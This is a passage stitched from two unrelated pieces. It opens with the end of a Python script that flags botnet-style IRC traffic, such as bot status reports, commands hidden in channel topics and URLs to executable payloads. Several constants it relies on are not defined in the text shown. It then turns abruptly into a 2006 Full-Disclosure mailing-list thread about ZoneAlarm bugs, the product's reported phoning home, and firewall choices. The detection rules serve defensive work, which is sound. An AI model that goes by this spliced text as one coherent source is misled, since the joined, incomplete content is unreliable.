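    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        return prefix, "", []
    params = parts[1:] + ([trailing] if sep else [])
    return prefix, parts[0].upper(), params


def scan_stream(text):
    """Return (line_number, rule, detail) tuples for bot-like IRC traffic."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        prefix, command, params = parse_irc_line(line)
        body = params[-1] if params else ""

        # Messages without a prefix were sent by the monitored host itself.
        if prefix is None and command == "PRIVMSG":
            tag = STATUS_TAG.match(body)
            if tag:
                findings.append((lineno, "bot-status-report", tag.group(1)))

        # RPL_TOPIC (332) or TOPIC carrying a dot/bang command and a URL.
        if (command in ("332", "TOPIC") and body.startswith((".", "!"))
                and URL.search(body)):
            findings.append((lineno, "command-in-topic", body.split()[0]))

        # Any URL in the message text that points at executable content.
        for url in URL.findall(body):
            url = url.rstrip(".,")
            if url.lower().endswith(PAYLOAD_EXT):
                findings.append((lineno, "payload-url", url))

        # RPL_LUSERCLIENT (251): nearly every client hidden behind +i.
        if command == "251":
            counts = LUSERS.search(body)
            if counts:
                visible, invisible = int(counts.group(1)), int(counts.group(2))
                if invisible >= 10 * max(visible, 1):
                    findings.append((lineno, "mostly-invisible-users", str(invisible)))
    return findings


def is_suspect(findings):
    """Require two different rules so a single odd line does not raise an alert."""
    return len(Counter(rule for _, rule, _ in findings)) >= 2


if __name__ == "__main__":
    for finding in scan_stream(SAMPLE_STREAM):
        print(finding)
    print("suspect:", is_suspect(scan_stream(SAMPLE_STREAM)))
```

The rules key on message shape rather than on the addresses in the post, so they still match if the server or channel changes.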
Re: [Full-disclosure] Re: Re: PC Firewall Choices
I guess I will stick with Kaspersky which will probably phone home to Russia or something. Does anyone have any experience with the Firewall that comes with paid AVG? I just run free AVG currently on most computers so have not used it.

Regards, Nancy Kramer

At 01:15 AM 1/20/2006, [EMAIL PROTECTED] wrote: I have been following this discussion waiting for someone to mention another feature of Zone Alarm: Posted January 13, 3:00 a.m. PST Pacific Time, ROBERT X. CRINGELY http://www.infoworld.com/ A Perfect Spy? It seems that ZoneAlarm Security Suite has been phoning home, even when told not to. Last fall, InfoWorld Senior Contributing Editor James Borck discovered ZA 6.0 was surreptitiously sending encrypted data back to four different servers, despite disabling all of the suite's communications options. Zone Labs denied the flaw for nearly two months, then eventually chalked it up to a bug in the software -- even though instructions to contact the servers were set out in the program's XML code. A company spokesmodel says a fix for the flaw will be coming soon and worried users can get around the bug by modifying their Host file settings. However, there's no truth to the rumor that the NSA used ZoneAlarm to spy on U.S. citizens. :) Hummer - Original Message - From: Nancy Kramer [EMAIL PROTECTED] To: Greg [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, January 19, 2006 11:27 PM Subject: RE: [Full-disclosure] Re: Re: PC Firewall Choices I have the paid ZA but I heard the free one was better. Have no idea about that but would never buy the paid version again. At least now I know what was happening. Will try to look for that feature and set it to the maximum minutes. I only have it on my laptop which only goes on the internet sporadically but generally goes on the internet on public wireless networks which I think may not be all that secure. Lots of times I am meeting with someone there and we talk and then lookup something on the internet.
I could see how time could pass quickly and I might not touch the computer for awhile. Thanks for the explanation. Regards, Nancy Kramer At 10:10 PM 1/19/2006, Greg wrote: -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nancy Kramer Sent: Friday, 20 January 2006 2:30 PM To: Stan Bubrouski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can. That'd be a well known and never fixed bug I reported to Zonelabs some years back now. It has a feature to automatically lock internet connection after so many minutes of inactivity. The length of time can be changed by the user. What it REALLY did was cut off access to internet and any LAN you were on, isolating you entirely and never actually let go of it when the user was back at the keyboard. Exiting ZA let that go and internet and lan were restored. You have the option to turn that feature OFF but even that didn't stop the whole thing happening. So, about the only thing you could do was to set the auto lock as high as it could go and turn the feature off. It would still go off after that many minutes had passed (which I believe is 999 in the PRO version and 99 in the free version) and lock you out again but it was delayed by that much, at least. You CAN set certain programs to pass by its' lock, however. So, if you have some computers almost always chattering away on a distributed project but otherwise not touched, you could allow those programs to pass on even though, should you attempt to get out with a simple web browser (where it wasn't allowed to pass the lock), you cant. Saves some stuffing about on such machines and let's face it - the more free some company execs see, the more likely they are to use it. Surprising how many Windows based companies use free ZA. 
___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia -